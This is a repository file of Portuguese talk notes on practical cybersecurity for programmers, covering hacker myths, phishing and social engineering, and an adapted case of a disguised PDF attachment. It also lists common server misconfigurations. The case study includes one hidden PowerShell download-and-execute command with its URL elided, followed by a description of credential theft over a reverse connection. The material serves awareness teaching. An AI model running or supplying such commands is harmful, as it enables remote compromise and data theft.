kasparyan/caderno-virtual
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
92c0560066
caderno-virtual/Palestras/Cybersegurança na prática.md

6.2 KiB
Raw Blame History

Cybersegurança na prática: onde realmente os sistemas quebram

Parte 0 — Olá

Olá.

Meu nome é Álvaro. Alguns me conhecem como Russo Incendiário.

sim, eu realmente cuspo fogo

Prometo que hoje eu não vou incendiar nada.

Eu gosto muito de três coisas:

  • Ciência
  • Tecnologia
  • E entender como as coisas funcionam

Especialmente quando elas quebram.

E é exatamente disso que a gente vai falar hoje.

Parte 1 — Quebrando o mito

beep boop — "We're in."

Todo mundo já viu algum hacker na cultura popular.

Tela preta com código subindo. Um cara de capuz digitando freneticamente. Três telas.

Cybersegurança não é isso. Criador do The Pirate Bay Viram só, ele não usa capuz.

Hackers não “adivinham senha”. Não é força bruta cinematográfica. Não é mágica. Não é genialidade sobre-humana.

É engenharia.

É entender como um sistema funciona — melhor do que quem construiu.

Se você tem um cadeado que precisa ser aberto, você não precisa da chave.

Você precisa entender como o cadeado funciona.

Como os pinos se alinham. Como a mola responde. Onde está a tensão.

Um chaveiro sabe abrir um cadeado sem a chave.

Não porque ele é mágico. Mas porque ele entende o mecanismo.

Ser hacker é isso.

Exercício mental

Eu quero invadir sua casa.

Quem eu chamo?

  1. Um ladrão profissional.
  2. Ou o chaveiro da esquina?

O ladrão talvez quebre a porta. Faça barulho. Chame atenção.

O chaveiro? Ele abre. Sem quebrar nada. Sem alarme. Sem ninguém perceber.

Hackear é ser o chaveiro.

Não é destruir o sistema. É manipulá-lo.

E aqui está o ponto importante:

A maioria dos sistemas não é invadida porque alguém foi brilhante.

É invadida porque alguém deixou um parafuso solto.

Cybersegurança não é sobre impedir o impossível.

É sobre revisar cada engrenagem antes que alguém curioso resolva entender como ela funciona.

Parte 2 — O Maior Vetor de Ataque Não É Técnico

“É mais fácil convencer alguém a abrir a porta do que arrombar a porta.”

Se você quer proteger um sistema, precisa aceitar uma coisa desconfortável:

Humanos são parte do sistema.

E humanos são previsíveis.

Coloque isso na sua cabeça:

  • Usuários são superfície de ataque.
  • Confiança é explorável.
  • Pressa é explorável.
  • Autoridade é explorável.
  • Curiosidade é explorável.
  • Medo é explorável.

Phishing funciona não porque as pessoas são burras.

Mas porque ele parece legítimo.

Ele imita:

  • Linguagem
  • Layout
  • Urgência
  • Contexto

Ele explora algo que já existe: confiança.

Exercício mental

O que é mais fácil fazer para conseguir seus dados bancários?

  1. Hackear a infraestrutura do Nubank? Invadir datacenter. Quebrar criptografia. Burlar monitoramento. Fugir de auditoria. Não deixar log.

Ou...

  1. Criar um site dizendo: “Descubra qual jogador do Real Madrid você seria” e pedir seus dados para “confirmar identidade”?

Qual dos dois exige mais engenharia? Qual dos dois dá menos trabalho? Qual dos dois é menos arriscado?

Ou vamos pensar menos.

O que é mais fácil fazer para conseguir sua senha da Steam? 1.

A maioria dos ataques não acontece porque alguém invadiu o banco.

Acontece porque alguém clicou.

Porque alguém confiou. Porque alguém estava com pressa. Porque parecia normal.

E aqui está a parte importante para vocês como programadores:

Quando você constrói um sistema, você não está protegendo só código.

Você está protegendo pessoas.

E pessoas:

  • reutilizam senha,
  • clicam sem ler,
  • ignoram alerta,
  • acreditam em urgência.

O atacante sabe disso.

Ele não começa pelo firewall. Ele começa pelo comportamento.

Segurança não começa na criptografia.

Começa na cultura.

Parte 3: Conheça seu alvo

Pergunte para qualquer estrategista como vencer uma batalha. Sua provavelmente resposta será

"Conheça seu inimigo"

Exemplo de caso real

Caso real (adaptado)

Uberlândia, 14h37.

O CEO de uma empresa local está no escritório. Reuniões pela manhã. Planilhas abertas. WhatsApp Web piscando. Ar-condicionado fraco — ele comenta com alguém da equipe.

No meio disso, ele confere os e-mails.

Assunto: "Nota Fiscal Fornecedor Atlas Comercial LTDA"

Nada estranho. A empresa realmente tem fornecedores. O layout do e-mail parece normal. Assinatura, CNPJ, telefone. Tudo plausível.

Ele abre.

Anexo: nf-210230120310240102.zip

Ele extrai.

Dentro: nf-210230120310240102.pdf

Ícone de PDF. Nome de PDF. Extensão de PDF.

Ele dá dois cliques.

Por menos de um segundo, uma janela preta pisca na tela.

Ele nem percebe. Acredita que o arquivo corrompeu. Fecha. Volta para o trabalho.

O que ele não viu:

O arquivo não era um PDF. Era um atalho disfarçado. Um pequeno script.

Algo equivalente a:

powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest ... | Invoke-Expression"

Em português simples:

“Baixe código da internet. Execute. Não mostre nada.”

Em menos de 3 segundos:

  • Um agente é instalado.
  • A máquina estabelece conexão reversa.
  • Um servidor externo agora pode enviar comandos.
  • A sessão está ativa.

Não houve:

  • Exploit sofisticado.
  • Zero-day.
  • Quebra de criptografia.
  • Força bruta.

Só um clique.

Nos dias seguintes:

  • Credenciais salvas no navegador são extraídas.
  • Tokens de sessão são copiados.
  • Acesso ao sistema interno é mapeado.
  • Pastas compartilhadas são indexadas.
  • E-mails são lidos.
  • Dados de clientes são copiados silenciosamente.

Nada trava. Nada quebra. Nada avisa.

Sem ransomware. Sem tela vermelha. Sem pedido de resgate.

Só coleta.

Meses depois, a empresa descobre que seus dados estão sendo usados para aplicar golpes em seus próprios clientes.

A pergunta não é: “Como invadiram?”

A pergunta é: Onde estava o parafuso solto?

Parte 4: Vulnerabilidades do Mundo Real

Caso 1: Sistema de Controle de Acesso vazando senhas de rede.

  • SQL Injection em simulador
  • PostgreSQL exposto sem autenticação
  • Redis aberto (pode mencionar como exemplo clássico)